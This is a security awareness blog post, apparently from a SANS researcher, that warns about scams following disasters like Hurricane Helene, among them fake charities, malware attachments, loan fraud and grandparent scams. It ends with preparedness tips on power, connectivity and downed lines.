For a few years now, October has been "National Cyber Security Awareness Month". This year, it is a good opportunity for a refresher on some scams that tend to happen around disasters like Hurricane Helene. The bigger the disaster, the more attractive it is to scammers.

Fake Donation Sites

Hurricane Katrina was the first event that triggered many fake donation websites. Since then, the number of fake donation websites has decreased somewhat, partly due to law enforcement attention and hopefully due to people becoming more aware of these scams. These scams either pretend to be a new charity/group attempting to help or impersonate an existing reputable charity. People in affected areas need help. Please only donate to groups you are familiar with and who were active before the event.

AI Social Media Posts

I believe these posts are mostly created to gain social media followers, maybe with the intent to later reel them into some scam. They often post dramatic images created with AI tools or copied from legitimate accounts. Some may just be interested in some of the monetization schemes social media and video sites are participating. Do not amplify these accounts. Strictly speaking, they are not "fake news," but legitimate news sources who go out to take pictures and gather information need exposure more than these fake accounts. Often, the fake accounts will contribute to at least exaggeration of the impact of the event and reduce, in some cases, the credibility of legitimate recovery efforts

Malware

Attackers may use the event as a pretense to trick victims into opening attachments. In the past, we have seen e-mails and websites that spread malware claiming to include videos or images of the event. These attachments turn out to be executables installing malware.

Fake Assistance Scams

In the aftermath of a disaster, organizations often provide financial aid through loans. Scammers will apply for these loans using stolen identities traded online. If it may take several months for the victim to become aware of this, they often face a request to repay the loan. Sadly, there is not much, if anything, to protect yourself from these scams. The intend of the assistance is to be quick and unburocratic and to "sort things out later". You may have to prove that someone else used your information to apply for the loan.

"Grandparent Scam"

In this scam, a caller will pretend to be a relative or close friend, asking for money. These scams have improved because they can often identify individuals in the disaster area and use them as a pretense to extort money. The caller may claim to be the individual (often they use SMS or other text messaging services), or they may claim to represent a police department or a hospital. Do not respond to any demands for money. Notify your local police department. If you are concerned, try to reach out to the agency calling you using a published number (note that Google listings can be fake). Due to the conditions in affected areas, the local authorities may be unable to respond. Your local law enforcement agency may be able to assist. They often have a published "non-emergency" number you can use instead of 911. Individuals in the affected area may not be reachable due to spotty power and cell service availability.

Final Word

Please let us know if we missed anything. A final word on some disaster preparedness items with an "IT flavor":

1. Have a plan to get out, and if you can get out: get out. You should not stay in the affected area unless you are part of the recovery effort.
2. Cellular networks fail. Cellular networks tend to work pretty well during smaller disasters, but they need power, towers, and other infrastructure, which will fail in large-scale disasters. Satellite connectivity quickly becomes your only viable option (if you have power). If you have a phone with satellite emergency calling (for example, a recent iPhone), they offer a "demo mode" to familiarize you with the feature.
3. If you are lucky to already have a Starlink setup, bring the antenna inside before the storm and disconnect the equipment from power to avoid spikes destroying it.
4. Disconnect as many electric devices from outlets as possible during a power outage (or before power outages are expected). Power outages often come with power spikes and other irregular power events that can destroy sensitive electronics. Do not plug them back in until power is restored and stable.
5. Even a downed phone or cable TV line can be energized. You may not see the high voltage line that is also down and touches the cable TV line. I took the picture on the right this weekend in my neighborhood of a high-voltage line touching the cable TV and phone line.

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|